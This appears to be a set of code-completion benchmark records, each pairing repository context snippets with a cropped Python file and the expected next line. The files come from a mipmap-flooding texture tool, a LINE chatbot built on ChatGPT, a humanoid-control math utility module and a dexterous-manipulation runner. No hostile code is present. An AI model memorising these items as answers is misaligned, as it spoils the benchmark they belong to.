logger.info(f"--- File disk size: {os.path.getsize(color) / float(1 << 20):,.2f} MB")
return [color_map, alpha_mask]
def _validate_inputs(color: Image, alpha_mask: Image, logger: logging.Logger,
input_texture_color_abs_path: str) -> str | Optional[None]:
if color is None or alpha_mask is None:
message = f"One or more inputs do not exist:\n\t-Color: {color}\n\t-Alpha: {alpha_mask}. Skipping..."
elif not _do_resolutions_match(color, alpha_mask, logger):
message = f"Inputs do not match in resolution for file: {input_texture_color_abs_path}. Skipping..."
elif not _is_power_of_two_image(color, logger):
message = f"Input is not a power of two image: {input_texture_color_abs_path}. Skipping..."
else:
message = None
return message
def _do_resolutions_match(color: Image, alpha: Image, logger: logging.Logger) -> bool:
"""Check if the resolutions of color and alpha images match."""
logger.info("--- Verifying that inputs resolutions do match ...")
return True if color.size == alpha.size else False
def _is_power_of_two_image(color: Image, logger: logging.Logger) -> bool:
"""Check if all dimensions of the input image are powers of two."""
logger.info("--- Verifying that inputs are power of two images ...")
for res in color.size:
if (res & (res - 1)) != 0:
return False
return True
def _get_mip_levels(image: Image, logger: logging.Logger) -> int:
"""Calculate the number of mip levels based on image size."""
logger.info("--- Calculating mip map levels...")
image_short_side = image.size[0] if image.size[0] < image.size[1] else image.size[1]
logger.info(f"--- Done. Miplevels: {round(math.log2(image_short_side))}")
return round(math.log2(image_short_side))
def _generate_background(image: Image, logger: logging.Logger) -> Image:
"""Generate a background image and returns the result Image object."""
logger.info("--- Generating background image and storing it in memory...")
average_image_color = image.resize((1, 1))
up_scaled_avg = average_image_color.resize(image.size, Image.NEAREST)
return up_scaled_avg
def _calculate_image_height(image_width: int, image: Image) -> int:
"""Calculate the height of the image based on the specified width."""
width_percent = (image_width / float(image.size[0]))
new_height = int((float(image.size[1]) * float(width_percent)))
return new_height
def _stack_mip_levels(average_bgr: str, miplevels: int, color: Image, origin_width: int, origin_height: int,
output_dir: str, logger: logging.Logger, resample: Image.Resampling = Image.BOX) -> None:
"""Stack Mipmap levels on a background Image with alpha integration to generate a single Image."""
stack = average_bgr
logger.info(f"--- Storing original resolution in memory: {origin_width, origin_height}")
logger.info(f"--- Beginning the stacking process. Please wait...")
for miplevel in range(miplevels):
width = 2 ** (miplevel + 1)
height = _calculate_image_height(width, color)
new_image = color.resize((width, height), resample)
to_stack = new_image.copy().resize((origin_width, origin_height), Image.NEAREST)
img_copy = stack.copy()
img_copy.paste(to_stack, (0, 0), to_stack)
stack = img_copy.copy()
logger.info(f"--- Saving stack to file: {output_dir}")
stack.save(output_dir)
logger.info(f"--- Output disk size: {os.path.getsize(output_dir) / float(1 << 20):,.2f} MB")
def _log_and_terminate(logger, message, level=logging.ERROR):
"""Log the given 'message' at the specified 'level' using the 'logger', and then terminate the logger."""
logger.log(level=level, msg=message)
terminate_loggers(logger)
def _make_logger_for_file(directory: str, filename: str) -> logging.Logger:
"""Constructs the full path to a log file, clears the existing log file, and sets up a logger."""
logs_directory = os.path.join(directory, "logs")
Path(logs_directory).mkdir(parents=True, exist_ok=True)
out_log_file = Path(os.path.join(logs_directory, f"{filename.split('.')[0]}.txt"))
clear_log_file(out_log_file)
return setup_logger("mipmap_flooding", out_log_file.__str__())
def run_mip_flooding(in_texture_color_abs_path: str, in_texture_alpha_abs_path: str, out_abs_path: str) -> None:
"""
Perform Mipmap Flooding on input color and alpha textures to optimize for disk storage.
This function processes a pair of input textures (color and alpha). It generates Mipmap levels, starting from the
original resolution and gradually downsizing to a 1x1 Mipmap. The function then assembles these Mipmaps, layer by
layer, reintegrating the alpha channel, until it reaches the original resolution.
Args:
in_texture_color_abs_path (str): The absolute path to the color texture image.
in_texture_alpha_abs_path (str): The absolute path to the alpha texture image.
out_abs_path (str): The absolute path for the output image.
Example:
run_mip_flooding('input_color.png', 'input_alpha.png', 'output_texture.png')
"""
start_time = time.perf_counter()
| # Default packages
# Third party packages
# From self package
def _open_image_inputs(color: str, alpha: str, logger: logging.Logger) -> List:
"""Open and return the color and alpha images as a list of Image objects."""
logger.info("--- Opening images in memory...")
if not color:
color = str(None)
if not alpha:
alpha = str(None)
color_map = None if not Path(color).exists() else Image.open(color)
alpha_mask = None if not Path(alpha).exists() else Image.open(alpha).convert('L')
if color_map:
logger.info(f"--- File disk size: {os.path.getsize(color) / float(1 << 20):,.2f} MB")
return [color_map, alpha_mask]
def _validate_inputs(color: Image, alpha_mask: Image, logger: logging.Logger,
input_texture_color_abs_path: str) -> str | Optional[None]:
if color is None or alpha_mask is None:
message = f"One or more inputs do not exist:\n\t-Color: {color}\n\t-Alpha: {alpha_mask}. Skipping..."
elif not _do_resolutions_match(color, alpha_mask, logger):
message = f"Inputs do not match in resolution for file: {input_texture_color_abs_path}. Skipping..."
elif not _is_power_of_two_image(color, logger):
message = f"Input is not a power of two image: {input_texture_color_abs_path}. Skipping..."
else:
message = None
return message
def _do_resolutions_match(color: Image, alpha: Image, logger: logging.Logger) -> bool:
"""Check if the resolutions of color and alpha images match."""
logger.info("--- Verifying that inputs resolutions do match ...")
return True if color.size == alpha.size else False
def _is_power_of_two_image(color: Image, logger: logging.Logger) -> bool:
"""Check if all dimensions of the input image are powers of two."""
logger.info("--- Verifying that inputs are power of two images ...")
for res in color.size:
if (res & (res - 1)) != 0:
return False
return True
def _get_mip_levels(image: Image, logger: logging.Logger) -> int:
"""Calculate the number of mip levels based on image size."""
logger.info("--- Calculating mip map levels...")
image_short_side = image.size[0] if image.size[0] < image.size[1] else image.size[1]
logger.info(f"--- Done. Miplevels: {round(math.log2(image_short_side))}")
return round(math.log2(image_short_side))
def _generate_background(image: Image, logger: logging.Logger) -> Image:
"""Generate a background image and returns the result Image object."""
logger.info("--- Generating background image and storing it in memory...")
average_image_color = image.resize((1, 1))
up_scaled_avg = average_image_color.resize(image.size, Image.NEAREST)
return up_scaled_avg
def _calculate_image_height(image_width: int, image: Image) -> int:
"""Calculate the height of the image based on the specified width."""
width_percent = (image_width / float(image.size[0]))
new_height = int((float(image.size[1]) * float(width_percent)))
return new_height
def _stack_mip_levels(average_bgr: str, miplevels: int, color: Image, origin_width: int, origin_height: int,
output_dir: str, logger: logging.Logger, resample: Image.Resampling = Image.BOX) -> None:
"""Stack Mipmap levels on a background Image with alpha integration to generate a single Image."""
stack = average_bgr
logger.info(f"--- Storing original resolution in memory: {origin_width, origin_height}")
logger.info(f"--- Beginning the stacking process. Please wait...")
for miplevel in range(miplevels):
width = 2 ** (miplevel + 1)
height = _calculate_image_height(width, color)
new_image = color.resize((width, height), resample)
to_stack = new_image.copy().resize((origin_width, origin_height), Image.NEAREST)
img_copy = stack.copy()
img_copy.paste(to_stack, (0, 0), to_stack)
stack = img_copy.copy()
logger.info(f"--- Saving stack to file: {output_dir}")
stack.save(output_dir)
logger.info(f"--- Output disk size: {os.path.getsize(output_dir) / float(1 << 20):,.2f} MB")
def _log_and_terminate(logger, message, level=logging.ERROR):
"""Log the given 'message' at the specified 'level' using the 'logger', and then terminate the logger."""
logger.log(level=level, msg=message)
terminate_loggers(logger)
def _make_logger_for_file(directory: str, filename: str) -> logging.Logger:
"""Constructs the full path to a log file, clears the existing log file, and sets up a logger."""
logs_directory = os.path.join(directory, "logs")
Path(logs_directory).mkdir(parents=True, exist_ok=True)
out_log_file = Path(os.path.join(logs_directory, f"{filename.split('.')[0]}.txt"))
clear_log_file(out_log_file)
return setup_logger("mipmap_flooding", out_log_file.__str__())
def run_mip_flooding(in_texture_color_abs_path: str, in_texture_alpha_abs_path: str, out_abs_path: str) -> None:
"""
Perform Mipmap Flooding on input color and alpha textures to optimize for disk storage.
This function processes a pair of input textures (color and alpha). It generates Mipmap levels, starting from the
original resolution and gradually downsizing to a 1x1 Mipmap. The function then assembles these Mipmaps, layer by
layer, reintegrating the alpha channel, until it reaches the original resolution.
Args:
in_texture_color_abs_path (str): The absolute path to the color texture image.
in_texture_alpha_abs_path (str): The absolute path to the alpha texture image.
out_abs_path (str): The absolute path for the output image.
Example:
run_mip_flooding('input_color.png', 'input_alpha.png', 'output_texture.png')
"""
start_time = time.perf_counter() | out_directory = get_output_directory(out_abs_path) | 3 | 2023-10-25 11:05:59+00:00 | 4k |
Lin-jun-xiang/chatgpt-line-bot | chatgpt_linebot/urls.py | [
{
"identifier": "Memory",
"path": "chatgpt_linebot/memory.py",
"snippet": "class Memory(MemoryInterface):\n \"\"\"Chat Memory\n \n Args:\n storage (List[Dict[str, str]]): Chat history, ex: \n [\n {'role': 'system', 'content': 'You are a helpful assistant.'},\n {'role': 'user', content': 'Hi'},\n {'role': 'system', 'content': 'Hi. How can i assist u?'},\n ...\n ]\n\n id (int): user_id, grouop_id, room_id\n \"\"\"\n def __init__(self, memory_message_count: int) -> None:\n self.storage = defaultdict(list)\n self.memory_message_count = memory_message_count\n\n def _initialize(self, id: str) -> None:\n self.storage[id] = [{\n 'role': 'system', 'content': 'You are a helpful assistant.'\n }]\n\n def _drop_message(self, id: str) -> str:\n if len(self.storage.get(id)) >= (self.memory_message_count + 1) * 2 + 1:\n return [self.storage[id][0]] + self.storage[id][-(self.memory_message_count * 2):]\n return self.storage.get(id)\n\n def append(self, id: str, role: str, content: str) -> None:\n if self.storage[id] == []:\n self._initialize(id)\n self.storage[id].append({\n 'role': role,\n 'content': content\n })\n self._drop_message(id)\n\n def get(self, id: str) -> str:\n return self.storage[id]\n\n def remove(self, id: str) -> None:\n self.storage[id] = []"
},
{
"identifier": "chat_completion",
"path": "chatgpt_linebot/modules/chat.py",
"snippet": "def chat_completion(id: int, memory: Memory) -> str:\n \"\"\"Use OpenAI API via gpt4free providers\"\"\"\n response = chat(memory.get(id))\n memory.append(id, 'system', response)\n\n return response"
},
{
"identifier": "Horoscope",
"path": "chatgpt_linebot/modules/horoscope.py",
"snippet": "class Horoscope:\n HOST = \"https://www.cosmopolitan.com/tw/horoscopes/\"\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'\n }\n error_msg = (\n \"Cannot get the horoscope, please try again.🥶\\n\"\n \"Or connect to developer: https://github.com/Lin-jun-xiang/chatgpt-line-bot/issues\"\n )\n\n\n def __init__(self) -> None:\n self.horoscope_urls = self.get_horoscope_urls()\n\n def get_horoscope_urls(self) -> list:\n \"\"\"Get all horoscope urls\n Returns\n -------\n horoscope_urls (List[Dict]):\n [\n {'name': '天蠍座', 'url': 'https://www...'},\n {'name': '獅子座', 'url': 'https://www...'},\n ...\n ]\n \"\"\"\n try:\n response = requests.get(f\"{self.HOST}weekly/\", headers=self.headers)\n soup = BeautifulSoup(response.content, 'html.parser')\n\n # Find the script tag containing JSON data\n script_tag = soup.find('script', {'id': 'json-ld'})\n\n horoscope_urls = []\n\n if not script_tag:\n return\n # Extract the text content of the script tag\n script_content = script_tag.contents[0]\n\n # Load the JSON data\n json_data = json.loads(script_content)\n\n # Extract the information for each zodiac sign\n for item in json_data['itemListElement']:\n name = item['name']\n url = item['url']\n horoscope_urls.append({\"name\": name, \"url\": url})\n\n return horoscope_urls\n\n except Exception as e:\n print(e)\n\n def _process_horoscope_response(self, content: str) -> str:\n if not content:\n return f\"{self.error_msg}\\nContent is None.\"\n response = chat_completion(\n [{\"role\": \"user\", \"content\": horoscope_template+content}]\n )\n return response\n\n def get_horoscope_response(self, target: str) -> str:\n if not self.horoscope_urls:\n return f\"{self.error_msg}\\nNot found any horoscope urls.\"\n \n match_target = re.search(r'(\\w{2}座)', target)\n\n if not match_target:\n return self.error_msg\n \n for horoscope_url in self.horoscope_urls:\n if horoscope_url.get('name') == match_target.group():\n res = requests.get(horoscope_url.get('url'), headers=self.headers)\n soup = BeautifulSoup(res.content, 'html.parser')\n meta_excerpt = soup.find('meta', {'name': 'sailthru.excerpt'})\n\n if not meta_excerpt:\n return f\"{self.error_msg}\\nParse horoscope url failed.\"\n\n content = meta_excerpt.get('content')\n return self._process_horoscope_response(content)\n\n return self.error_msg"
},
{
"identifier": "recommend_videos",
"path": "chatgpt_linebot/modules/youtube_recommend.py",
"snippet": "def recommend_videos():\n \"\"\"Recommend youtube videos randomly\"\"\"\n push_video = random.sample(favorite_videos, 3)\n\n prompt = f\"{youtube_recommend_template}{push_video}\"\n response = chat_completion([{\"role\": \"user\", \"content\": prompt}])\n\n return response"
},
{
"identifier": "ImageCrawler",
"path": "chatgpt_linebot/modules/image_crawler.py",
"snippet": "class ImageCrawler:\n \"\"\"Crawl the Image\"\"\"\n def __init__(self, engine: str = 'icrawler', nums: int = 1) -> None:\n self.image_save_path = (\"./\")\n self.engine = engine\n self.nums = nums\n\n def _is_img_url(self, url) -> bool:\n \"\"\"Check the image url is valid or invalid\"\"\"\n try:\n response = requests.head(url)\n content_type = response.headers['content-type']\n return content_type.startswith('image/')\n except requests.RequestException:\n return False\n except Exception as e:\n return False\n\n def _icrawler(self, search_query: str, prefix_name: str = 'tmp') -> list:\n \"\"\"Icrawler for google search images (Free)\"\"\"\n google_crawler = GoogleImageCrawler(\n downloader_cls=CustomLinkPrinter,\n storage={'root_dir': self.image_save_path},\n parser_threads=4,\n downloader_threads=4\n )\n\n # TODO: https://github.com/hellock/icrawler/issues/40\n google_crawler.session.verify = False\n google_crawler.downloader.file_urls = []\n\n google_crawler.crawl(\n keyword=search_query,\n max_num=self.nums,\n file_idx_offset=0\n )\n img_urls = google_crawler.downloader.file_urls\n print(f'Get image urls: {img_urls}')\n\n return img_urls[:self.nums]\n\n def get_url(self, search_query: str) -> str:\n try:\n if self.engine == 'icrawler':\n urls = self._icrawler(search_query)\n for url in urls:\n if self._is_img_url(url):\n return url\n\n except Exception as e:\n print(f'\\033[31m{e}')"
},
{
"identifier": "girlfriend",
"path": "chatgpt_linebot/prompts/template.py",
"snippet": ""
}
] | import sys
import config
from fastapi import APIRouter, HTTPException, Request
from linebot import LineBotApi, WebhookHandler
from linebot.exceptions import InvalidSignatureError
from linebot.models import *
from chatgpt_linebot.memory import Memory
from chatgpt_linebot.modules import (
Horoscope,
ImageCrawler,
chat_completion,
recommend_videos,
)
from chatgpt_linebot.prompts import girlfriend | 2,643 |
sys.path.append(".")
line_app = APIRouter()
memory = Memory(3)
horoscope = Horoscope()
line_bot_api = LineBotApi(config.LINE_CHANNEL_ACCESS_TOKEN)
handler = WebhookHandler(config.LINE_CHANNEL_SECRET)
@line_app.post("/callback")
async def callback(request: Request) -> str:
"""LINE Bot webhook callback
Args:
request (Request): Request Object.
Raises:
HTTPException: Invalid Signature Error
Returns:
str: OK
"""
signature = request.headers["X-Line-Signature"]
body = await request.body()
# handle webhook body
try:
handler.handle(body.decode(), signature)
except InvalidSignatureError:
raise HTTPException(status_code=400, detail="Missing Parameter")
return "OK"
@handler.add(MessageEvent, message=(TextMessage))
def handle_message(event) -> None:
"""Event - User sent message
Args:
event (LINE Event Object)
Refs:
https://developers.line.biz/en/reference/messaging-api/#message-event
https://www.21cs.tw/Nurse/showLiangArticle.xhtml?liangArticleId=503
"""
if not isinstance(event.message, TextMessage):
return
reply_token = event.reply_token
user_id = event.source.user_id
response = None
# Get user sent message
user_message = event.message.text
pre_prompt = girlfriend
refine_message = f"{pre_prompt}:\n{user_message}"
if user_message.startswith('@img'):
try:
img_crawler = ImageCrawler(nums=5)
img_url = img_crawler.get_url(user_message.replace('@img', ''))
image_message = ImageSendMessage(
original_content_url=img_url, preview_image_url=img_url
)
line_bot_api.reply_message(reply_token=reply_token, messages=image_message)
except:
line_bot_api.reply_message(
reply_token=reply_token,
messages='Image cannot encode successfully.'
)
return
if user_message.startswith('@chat 星座運勢'):
response = horoscope.get_horoscope_response(user_message)
elif event.source.type == 'user':
user_name = line_bot_api.get_profile(user_id).display_name
print(f'{user_name}: {user_message}')
memory.append(user_id, 'user', refine_message)
response = chat_completion(user_id, memory)
elif event.source.type == 'group' and user_message.startswith('@chat'):
group_id = event.source.group_id
memory.append(group_id, 'user', refine_message.replace('@chat', ''))
response = chat_completion(group_id, memory)
elif event.source.type == 'room' and user_message.startswith('@chat'):
room_id = event.source.room_id
memory.append(room_id, 'user', refine_message.replace('@chat', ''))
response = chat_completion(room_id, memory)
# Reply with same message
if response:
messages = TextSendMessage(text=response)
line_bot_api.reply_message(reply_token=reply_token, messages=messages)
@line_app.get("/recommend")
def recommend_from_yt() -> None:
"""Line Bot Broadcast
Descriptions
------------
Recommend youtube videos to all followed users.
(Use cron-job.org to call this api)
References
----------
https://www.cnblogs.com/pungchur/p/14385539.html
https://steam.oxxostudio.tw/category/python/example/line-push-message.html
"""
|
sys.path.append(".")
line_app = APIRouter()
memory = Memory(3)
horoscope = Horoscope()
line_bot_api = LineBotApi(config.LINE_CHANNEL_ACCESS_TOKEN)
handler = WebhookHandler(config.LINE_CHANNEL_SECRET)
@line_app.post("/callback")
async def callback(request: Request) -> str:
"""LINE Bot webhook callback
Args:
request (Request): Request Object.
Raises:
HTTPException: Invalid Signature Error
Returns:
str: OK
"""
signature = request.headers["X-Line-Signature"]
body = await request.body()
# handle webhook body
try:
handler.handle(body.decode(), signature)
except InvalidSignatureError:
raise HTTPException(status_code=400, detail="Missing Parameter")
return "OK"
@handler.add(MessageEvent, message=(TextMessage))
def handle_message(event) -> None:
"""Event - User sent message
Args:
event (LINE Event Object)
Refs:
https://developers.line.biz/en/reference/messaging-api/#message-event
https://www.21cs.tw/Nurse/showLiangArticle.xhtml?liangArticleId=503
"""
if not isinstance(event.message, TextMessage):
return
reply_token = event.reply_token
user_id = event.source.user_id
response = None
# Get user sent message
user_message = event.message.text
pre_prompt = girlfriend
refine_message = f"{pre_prompt}:\n{user_message}"
if user_message.startswith('@img'):
try:
img_crawler = ImageCrawler(nums=5)
img_url = img_crawler.get_url(user_message.replace('@img', ''))
image_message = ImageSendMessage(
original_content_url=img_url, preview_image_url=img_url
)
line_bot_api.reply_message(reply_token=reply_token, messages=image_message)
except:
line_bot_api.reply_message(
reply_token=reply_token,
messages='Image cannot encode successfully.'
)
return
if user_message.startswith('@chat 星座運勢'):
response = horoscope.get_horoscope_response(user_message)
elif event.source.type == 'user':
user_name = line_bot_api.get_profile(user_id).display_name
print(f'{user_name}: {user_message}')
memory.append(user_id, 'user', refine_message)
response = chat_completion(user_id, memory)
elif event.source.type == 'group' and user_message.startswith('@chat'):
group_id = event.source.group_id
memory.append(group_id, 'user', refine_message.replace('@chat', ''))
response = chat_completion(group_id, memory)
elif event.source.type == 'room' and user_message.startswith('@chat'):
room_id = event.source.room_id
memory.append(room_id, 'user', refine_message.replace('@chat', ''))
response = chat_completion(room_id, memory)
# Reply with same message
if response:
messages = TextSendMessage(text=response)
line_bot_api.reply_message(reply_token=reply_token, messages=messages)
@line_app.get("/recommend")
def recommend_from_yt() -> None:
"""Line Bot Broadcast
Descriptions
------------
Recommend youtube videos to all followed users.
(Use cron-job.org to call this api)
References
----------
https://www.cnblogs.com/pungchur/p/14385539.html
https://steam.oxxostudio.tw/category/python/example/line-push-message.html
""" | videos = recommend_videos() | 3 | 2023-10-24 09:01:13+00:00 | 4k |
nv-tlabs/pacer | uhc/utils/math_utils_new.py | [
{
"identifier": "quaternion_matrix",
"path": "uhc/utils/transformation.py",
"snippet": "def quaternion_matrix(quaternion):\n \"\"\"Return homogeneous rotation matrix from quaternion.\n\n >>> M = quaternion_matrix([0.99810947, 0.06146124, 0, 0])\n >>> numpy.allclose(M, rotation_matrix(0.123, [1, 0, 0]))\n True\n >>> M = quaternion_matrix([1, 0, 0, 0])\n >>> numpy.allclose(M, numpy.identity(4))\n True\n >>> M = quaternion_matrix([0, 1, 0, 0])\n >>> numpy.allclose(M, numpy.diag([1, -1, -1, 1]))\n True\n\n \"\"\"\n q = numpy.array(quaternion, dtype=numpy.float64, copy=True)\n n = numpy.dot(q, q)\n if n < _EPS:\n return numpy.identity(4)\n q *= math.sqrt(2.0 / n)\n q = numpy.outer(q, q)\n return numpy.array([\n [1.0-q[2, 2]-q[3, 3], q[1, 2]-q[3, 0], q[1, 3]+q[2, 0], 0.0],\n [ q[1, 2]+q[3, 0], 1.0-q[1, 1]-q[3, 3], q[2, 3]-q[1, 0], 0.0],\n [ q[1, 3]-q[2, 0], q[2, 3]+q[1, 0], 1.0-q[1, 1]-q[2, 2], 0.0],\n [ 0.0, 0.0, 0.0, 1.0]], dtype=numpy.float64)"
},
{
"identifier": "quaternion_about_axis",
"path": "uhc/utils/transformation.py",
"snippet": "def quaternion_about_axis(angle, axis):\n \"\"\"Return quaternion for rotation about axis.\n\n >>> q = quaternion_about_axis(0.123, [1, 0, 0])\n >>> numpy.allclose(q, [0.99810947, 0.06146124, 0, 0])\n True\n\n \"\"\"\n q = numpy.array([0.0, axis[0], axis[1], axis[2]], dtype=np.float64)\n qlen = np.linalg.norm(q)\n q = q * math.sin(angle/2.0)\n q[0] = math.cos(angle/2.0)\n return q"
},
{
"identifier": "quaternion_inverse",
"path": "uhc/utils/transformation.py",
"snippet": "def quaternion_inverse(quaternion):\n \"\"\"Return inverse of quaternion.\n\n >>> q0 = random_quaternion()\n >>> q1 = quaternion_inverse(q0)\n >>> numpy.allclose(quaternion_multiply(q0, q1), [1, 0, 0, 0])\n True\n\n \"\"\"\n q = numpy.array(quaternion, dtype=numpy.float64, copy=True)\n q[1:] *= -1.0\n return q / numpy.dot(q, q)"
},
{
"identifier": "quaternion_multiply",
"path": "uhc/utils/transformation.py",
"snippet": "def quaternion_multiply(quaternion1, quaternion0):\n \"\"\"Return multiplication of two quaternions.\n\n >>> q = quaternion_multiply([4, 1, -2, 3], [8, -5, 6, 7])\n >>> numpy.allclose(q, [28, -44, -14, 48])\n True\n\n \"\"\"\n w0, x0, y0, z0 = quaternion0\n w1, x1, y1, z1 = quaternion1\n return numpy.array([\n -x1*x0 - y1*y0 - z1*z0 + w1*w0,\n x1*w0 + y1*z0 - z1*y0 + w1*x0,\n -x1*z0 + y1*w0 + z1*x0 + w1*y0,\n x1*y0 - y1*x0 + z1*w0 + w1*z0], dtype=numpy.float64)"
},
{
"identifier": "rotation_from_quaternion",
"path": "uhc/utils/transformation.py",
"snippet": "def rotation_from_quaternion(quaternion, separate=False):\n # if 1.0 - quaternion[0] < 1e-8:\n if np.abs(1.0 - quaternion[0]) < 1e-6 or np.abs(1 + quaternion[0]) < 1e-6:\n axis = np.array([1.0, 0.0, 0.0], dtype=np.float64)\n angle = 0.0\n else:\n angle = 2 * math.acos(quaternion[0])\n axis = quaternion[1:4] / math.sin(angle/2.0)\n axis /= np.linalg.norm(axis)\n\n return (axis, angle) if separate else axis * angle"
},
{
"identifier": "rotation_from_matrix",
"path": "uhc/utils/transformation.py",
"snippet": "def rotation_from_matrix(matrix):\n \"\"\"Return rotation angle and axis from rotation matrix.\n\n >>> angle = (random.random() - 0.5) * (2*math.pi)\n >>> direc = numpy.random.random(3) - 0.5\n >>> point = numpy.random.random(3) - 0.5\n >>> R0 = rotation_matrix(angle, direc, point)\n >>> angle, direc, point = rotation_from_matrix(R0)\n >>> R1 = rotation_matrix(angle, direc, point)\n >>> is_same_transform(R0, R1)\n True\n\n \"\"\"\n R = numpy.array(matrix, dtype=numpy.float64, copy=False)\n R33 = R[:3, :3]\n # direction: unit eigenvector of R33 corresponding to eigenvalue of 1\n w, W = numpy.linalg.eig(R33.T)\n i = numpy.where(abs(numpy.real(w) - 1.0) < 1e-8)[0]\n if not len(i):\n raise ValueError(\"no unit eigenvector corresponding to eigenvalue 1\")\n direction = numpy.real(W[:, i[-1]]).squeeze()\n # point: unit eigenvector of R33 corresponding to eigenvalue of 1\n w, Q = numpy.linalg.eig(R)\n i = numpy.where(abs(numpy.real(w) - 1.0) < 1e-8)[0]\n if not len(i):\n raise ValueError(\"no unit eigenvector corresponding to eigenvalue 1\")\n point = numpy.real(Q[:, i[-1]]).squeeze()\n point /= point[3]\n # rotation angle depending on direction\n cosa = (numpy.trace(R33) - 1.0) / 2.0\n if abs(direction[2]) > 1e-8:\n sina = (R[1, 0] + (cosa-1.0)*direction[0]*direction[1]) / direction[2]\n elif abs(direction[1]) > 1e-8:\n sina = (R[0, 2] + (cosa-1.0)*direction[0]*direction[2]) / direction[1]\n else:\n sina = (R[2, 1] + (cosa-1.0)*direction[1]*direction[2]) / direction[0]\n angle = math.atan2(sina, cosa)\n return angle, direction, point"
}
] | import torch
import math
import numpy as np
from uhc.utils.transformation import (
quaternion_matrix,
quaternion_about_axis,
quaternion_inverse,
quaternion_multiply,
rotation_from_quaternion,
rotation_from_matrix,
) | 2,298 |
def ewma(x, alpha=0.05):
avg = x[0]
for i in x[1:]:
avg = alpha * i + (1 - alpha) * avg
return avg
def normal_entropy(std):
var = std.pow(2)
entropy = 0.5 + 0.5 * torch.log(2 * var * math.pi)
return entropy.sum(1, keepdim=True)
def normal_log_density(x, mean, log_std, std):
var = std.pow(2)
log_density = -(x - mean).pow(2) / (2 * var) - 0.5 * math.log(2 * math.pi) - log_std
return log_density.sum(1, keepdim=True)
def get_qvel_fd(cur_qpos, next_qpos, dt, transform=None):
v = (next_qpos[:3] - cur_qpos[:3]) / dt
qrel = quaternion_multiply(next_qpos[3:7], quaternion_inverse(cur_qpos[3:7]))
# qrel /= np.linalg.norm(qrel)
axis, angle = rotation_from_quaternion(qrel, True)
if angle > np.pi: # -180 < angle < 180
angle -= 2 * np.pi #
elif angle < -np.pi:
angle += 2 * np.pi
rv = (axis * angle) / dt
rv = transform_vec(rv, cur_qpos[3:7], "root")
qvel = (next_qpos[7:] - cur_qpos[7:]) / dt
qvel = np.concatenate((v, rv, qvel))
if transform is not None:
v = transform_vec(v, cur_qpos[3:7], transform)
qvel[:3] = v
return qvel
def get_angvel_fd(prev_bquat, cur_bquat, dt):
q_diff = multi_quat_diff(cur_bquat, prev_bquat)
n_joint = q_diff.shape[0] // 4
body_angvel = np.zeros(n_joint * 3)
for i in range(n_joint):
body_angvel[3 * i : 3 * i + 3] = (
rotation_from_quaternion(q_diff[4 * i : 4 * i + 4]) / dt
)
return body_angvel
def transform_vec(v, q, trans="root"):
if trans == "root":
|
def ewma(x, alpha=0.05):
avg = x[0]
for i in x[1:]:
avg = alpha * i + (1 - alpha) * avg
return avg
def normal_entropy(std):
var = std.pow(2)
entropy = 0.5 + 0.5 * torch.log(2 * var * math.pi)
return entropy.sum(1, keepdim=True)
def normal_log_density(x, mean, log_std, std):
var = std.pow(2)
log_density = -(x - mean).pow(2) / (2 * var) - 0.5 * math.log(2 * math.pi) - log_std
return log_density.sum(1, keepdim=True)
def get_qvel_fd(cur_qpos, next_qpos, dt, transform=None):
v = (next_qpos[:3] - cur_qpos[:3]) / dt
qrel = quaternion_multiply(next_qpos[3:7], quaternion_inverse(cur_qpos[3:7]))
# qrel /= np.linalg.norm(qrel)
axis, angle = rotation_from_quaternion(qrel, True)
if angle > np.pi: # -180 < angle < 180
angle -= 2 * np.pi #
elif angle < -np.pi:
angle += 2 * np.pi
rv = (axis * angle) / dt
rv = transform_vec(rv, cur_qpos[3:7], "root")
qvel = (next_qpos[7:] - cur_qpos[7:]) / dt
qvel = np.concatenate((v, rv, qvel))
if transform is not None:
v = transform_vec(v, cur_qpos[3:7], transform)
qvel[:3] = v
return qvel
def get_angvel_fd(prev_bquat, cur_bquat, dt):
q_diff = multi_quat_diff(cur_bquat, prev_bquat)
n_joint = q_diff.shape[0] // 4
body_angvel = np.zeros(n_joint * 3)
for i in range(n_joint):
body_angvel[3 * i : 3 * i + 3] = (
rotation_from_quaternion(q_diff[4 * i : 4 * i + 4]) / dt
)
return body_angvel
def transform_vec(v, q, trans="root"):
if trans == "root": | rot = quaternion_matrix(q)[:3, :3] | 0 | 2023-10-31 20:47:12+00:00 | 4k |
Improbable-AI/dexenv | dexenv/runner/base_runner.py | [
{
"identifier": "stack_data",
"path": "dexenv/utils/common.py",
"snippet": "def stack_data(data, torch_to_numpy=False, dim=0):\n if isinstance(data[0], dict):\n out = dict()\n for key in data[0].keys():\n out[key] = stack_data([x[key] for x in data], dim=dim)\n return out\n if check_torch_tensor(data):\n try:\n ret = torch.stack(data, dim=dim)\n if torch_to_numpy:\n ret = ret.cpu().numpy()\n except:\n # if data is a list of arrays that do not have same shapes (such as point cloud)\n ret = data\n else:\n try:\n ret = np.stack(data, axis=dim)\n except:\n ret = data\n return ret"
},
{
"identifier": "TorchTrajectory",
"path": "dexenv/utils/data.py",
"snippet": "class TorchTrajectory:\n extra_data: Dict = field(default_factory=dict)\n data: Dict = field(default_factory=dict)\n # if capacity is given, then it will preallocate an array for items in StepData\n capacity: int = 500\n cur_id: int = 0\n list_data: List[InfoData] = field(default_factory=list)\n traj_keys_in_cpu: List = field(default_factory=list)\n\n def allocate_memory(self, step_data=None, **kwargs):\n sdata_dict = asdict(step_data) if step_data is not None else kwargs\n keys = sdata_dict.keys()\n filtered_keys = [\n x for x in keys if 'info' not in x and sdata_dict[x] is not None]\n for key in filtered_keys:\n val = sdata_dict[key]\n if isinstance(val, dict):\n for vk, vv in val.items():\n self._allocate_memory_with_key(self.convert_dict_key(key, vk), vv)\n else:\n self._allocate_memory_with_key(key, val)\n\n def convert_dict_key(self, parent_key, child_key):\n prefix = 'next_' if 'next_' in parent_key else ''\n new_key = f'{prefix + child_key}'\n return new_key\n\n def _allocate_memory_with_key(self, key, val):\n if isinstance(val, np.ndarray):\n val = torch.from_numpy(val)\n val_shape = val.shape\n if self.traj_keys_in_cpu is not None and key in self.traj_keys_in_cpu:\n device = 'cpu'\n else:\n device = val.device\n # logger.info(f'Traj key:{key} device:{device}')\n self.data[key] = torch.zeros((self.capacity,) + val_shape,\n device=device,\n dtype=val.dtype)\n\n def __getitem__(self, item):\n step_data = {k: self.data[k][item] for k in self.data.keys()}\n if len(self.list_data) > 0:\n info_data = self.list_data[item]\n step_data['info'] = info_data.info\n step_data['action_info'] = 